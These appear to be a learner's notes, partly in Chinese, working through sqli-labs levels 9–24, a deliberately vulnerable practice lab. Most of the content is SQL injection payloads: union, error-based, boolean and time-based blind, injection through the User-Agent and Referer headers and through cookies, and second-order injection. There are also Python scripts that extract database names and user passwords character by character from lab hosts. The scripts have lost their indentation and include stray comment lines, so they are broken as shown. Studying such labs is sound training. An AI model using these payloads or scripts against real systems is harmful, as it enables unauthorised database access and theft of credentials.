sqli-labs
less-9,10
import requests
import time
url = "http://10.160.104.208/sqli-labs-master/Less-10/?id="
flag = ''
for i in range(1, 50):
for j in range(32, 127):
a = '1" and if(ascii(substr(database(),{},1))={},sleep(2),1)--+'.format(i, j)
b = url + a
print(b)
start_time = time.time()
re = requests.get(url=b)
end_time = time.time()
sec = end_time - start_time
if sec >= 2:
flag = flag + chr(j)
print(flag)
sec=end_time-start_time //算出get请求和sleep后所用的时间
if sec >=2: //时间符号条件就print并退出
print(flag)
less-11
Username:
-1' union select 1,group_concat(username)from users#
Password:
-1' union select 1,group_concat(password)from users#
less-12
1")
less-13
1'):
1') and extractvalue(1,concat(0x7e,((select group_concat(username)from users)),0x7e))#
1') and extractvalue(1,concat(0x7e,((select group_concat(password)from users)),0x7e))#
less-14
1"
less-15
1' or ascii(substr((select group_concat(username)from users),1,1))#
1' or ascii(substr((select group_concat(password)from users),1,1))#
import requests
url = "http://10.160.105.77/sqli-labs-master/Less-15/"
flag = ""
for i in range(1, 50):
for j in range(32, 127):
a = "admin' and ascii(substr((select group_concat(username)from users),{},1))={}#".format(i, j)
data = {"uname": a, "passwd": a}
r = requests.post(url=url, data=data)
print(data)
if '../images/flag.jpg' in r.text:
flag = flag + chr(j)
print(flag)
import requests
import time
url = "http://10.160.105.77/sqli-labs-master/Less-15/"
flag = ""
for i in range(1, 50):
for j in range(32, 127):
a = "admin' and if(ascii(substr((select group_concat(username)from users),{},1))={},sleep(2),1)#".format(i, j)
data = {'uname': a, 'passwd': a}
print(data)
start_time = time.time()
r = requests.post(url=url, data=data)
end_time = time.time()
sec = end_time - start_time
if sec >= 2:
flag = flag + chr(j)
print(flag)
less-16
")
less-17
报错注入:
uname=Dumb&passwd=1' or updatexml(1,concat(0x7e,(version()),0x7e),2)# //版本
uname=Dumb&passwd=1' or updatexml(1,concat(0x7e,(database()),0x7e),2)# //数据库
uname=Dumb&passwd=1' and updatexml(1,concat('!',(select group_concat(table_name)from information_schema.tables where table_schema = 'security')),2)# //表名
uname=Dumb&passwd=1' and updatexml(1,concat('!',(select group_concat(column_name)from information_schema.columns where table_schema= 'security')),2)# //列名
无法直接从users表拿数据,在某个表中暂存从users中查出来的数据,然后再从这个暂存的表中取出数据:
uname=Dumb&passwd=1' and (updatexml(1,concat('!',(select concat_ws(':',username,password)from (select username,password from users)text limit 0,1)),1))#
修改limit n,m 查询数据
uname=Dumb&passwd=1' and (updatexml(1,concat('!',(select concat_ws(':',username,password)from (select username,password from users)text limit 1,1)),1))#
concat_ws()函数:用指定分隔符将多个字符串连接成一个字符串
用group_concat()函数表示
uname=Dumb&passwd=1' and (updatexml(1,concat(0x7e,((select
group_concat(username,password)from (select username,password from users)text)),0x7e),1))#
less-18
输入正确的密码:passwd=admin&uname=admin
判断闭合‘’
判断注入点为 User-Agent:
'or updatexml(1,concat("!",(select group_concat(password)from users)),1) or //数据库
或
1',1,updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),1))# //表
1',1,updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='users'),0x7e),1))# //列
1',1,updatexml(1,concat(0x7e,(select group_concat(password)from users),0x7e),1))# //字段
less-19
判断闭合‘’
判断注入点为 referer
'or extractvalue(1,concat("!",database())) or' //数据库
'or extractvalue(1,concat("!",(select group_concat(password)from users))) or'
less-20
输入正确的用户名和密码
passwd=admin&uname=admin
“Delet Your Cookie!" 判断注入点为cookie
uname=' union select 1,2,group_concat(password)from users#
less-24
二次注入:
1.插入1‘#
2.转义成1‘#
3.不能注入,但是保存在数据库时变成了原来的1’#
4.利用1‘#进行注入,这里利用时 要求取出数据时不转义
在数据库中#表示注释的意思,后面的语句不会执行,而admin后面的那个单引号又与前面的 ‘ 闭合,而原本后面的那个 ’ 因为是在#之后,所以就被注释掉了,所以他修改的其实还是admin的密码
登陆部分使用了mysql-real_escape_string进行转义处理 无法进行sql注入
注册 注册admin’#新账号:uname:admin‘#; passwd:123456
登录 修改admin’#账号密码 111111
发现更改了admin账号密码
